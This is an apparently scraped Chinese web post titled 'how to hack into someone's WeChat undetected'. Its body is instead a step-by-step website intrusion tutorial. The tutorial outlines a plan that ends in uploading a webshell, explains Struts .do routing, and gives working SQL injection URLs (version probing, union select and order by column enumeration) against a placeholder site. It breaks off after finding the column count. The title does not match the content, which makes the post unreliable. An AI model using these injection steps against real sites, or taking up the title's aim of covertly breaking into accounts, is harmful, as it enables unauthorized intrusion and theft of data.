怎么能黑进别人的微信不被发现(怎么偷上别人的微信)

入侵要点:à找到注入点;à暴露网站页面绝对路径;à利用mysql的load_file()读取网站配置信息找到管理后台;à上传webshell。 首先是了解一下 Struts和.do :首先了解一下什么是Struts。Struts是Apache基金会Jakarta项目组的一个Ope

入侵要点:
à找到注入点;
à暴露网站页面绝对路径;
à利用mysql的load_file()读取网站配置信息找到管理后台;
à上传webshell。 首先是了解一下 Struts和.do :
首先了解一下什么是Struts。Struts是Apache基金会Jakarta项目组的一个Open Source项目,是一种优秀的J2EE MVC架构方式,它利用taglib获得可重用代码和抽象 Java 代码,利用ActionServlet配合Struts-config.xml实现对整个系统导航。增强了开发人员对系统的整体把握,提高了系统的可维护性和可扩充性。 Struts的核心是Controller,即ActionServlet,而ActionServlet的核心就是Struts-config.xml,Struts-config.xml集中了所有页面的导航定义。
关于sstruts更加详细的内容可以到以下地址浏览:
复制内容到剪贴板代码: http://www.cn-java.com/www1/?action-viewnews-itemid-2207,
http://www.chinaitlab.com/www/techspecial/struts/,
http://www.ibm.com/developerworks/cn/java/j-struts/,
.do文件是一个网页后台程序,它实际不是一个文件,并没有一个真正的.do文件存在,它不能直接打开 ,struts使用一个特殊的servlet作为“交换机”,将来自web浏览器的请求转到相应的serverpage。在开发web应用时有一个必须要写的部署描述文件(web-inf/web.xml)。这个文件描述了你的web应用的配置,包括欢迎页面(welcome pages)(当请求没有指定时,出现在目录下的文件)、servlet(路径或者扩展名)和那些servlets的参数的映射。在这个文件中,你配置struts actionservlet作为一个操控所有指定映射(通常以.do为扩展名)请求的servlet——这就是“交换机”。
可以通过下面地址的内容更加清楚的明白.do文件: 复制内容到剪贴板代码:
http://topic.csdn.net/u/20071009/11/D16FB438-4A2A-47E2-A03A-F62366C8F064.html
访问xx.do页面实际就是访问xx.jsp文件,但是使用了struts技术的网站,直接访问xx.jsp是不会被Tomcat、Resin等web服务器解析的。
xx.do页面目录下必有web-inf文件夹,存放Struts-config.xml!! 下面开始转入主题:
1、打开目标站点,发现是jsp类型网站,页面后缀名称是.do和.jsp,
打开页面http://www.site.com.cn:8081/newslistAction.do?type=1,输入标点 ',根据页面返回的内容,发现网站是基于Apache Tomcat/5.0.28 的web服务器。 2、寻找注入点,打开“产品中心”-“网络防火墙”-打开一种产品的介绍,http://www.site.com.cn:8081/showproAction.do?id=47,试试是否能手工注入,根据对此站点的了解,数据库应该是mysql或者oracle,oracle那种大玩意我们就不敢碰了,先试试看是不是mysql,http://www.site.com.cn:8081/showproAction.do?id=47 and ord(mid(version(),1,1))>51,页面正常,说明是mysql,而且mysql的版本是4.0以上,可以使用union查询,下面爆一下字段数: 复制内容到剪贴板代码:
http://www.site.com.cn:8081/showproAction.do?id=47' and 1=2 union select 1,2/* 页面出错;
http://www.site.com.cn:8081/showproAction.do?id=47' and 1=2 union select 1,2,3/* 页面出错;
.....
http://www.site.com.cn:8081/showproAction.do?id=47' and 1=2 union select 1,2,3,4,5,6,7/*
页面正常,而且页面内容显示出我们想要的数字!!
mysql注入爆字段有个技巧,不需要这么麻烦进行猜测,可以利用order by 暴字段数,例如: 复制内容到剪贴板代码:
http://www.site.com.cn:8081/showproAction.do?id=47' order by 7/* 页面正常;
http://www.site.com.cn:8081/showproAction.do?id=47' order by
8/* 页面出错,说明共有7个字段

  • 发表于 2020-12-14 10:59
  • 阅读 ( 187 )
  • 分类:互联网

0 条评论

请先 登录 后评论
周晴
周晴

718 篇文章

你可能感兴趣的文章

相关问题

网站首页 最近更新 点击排行 热门推荐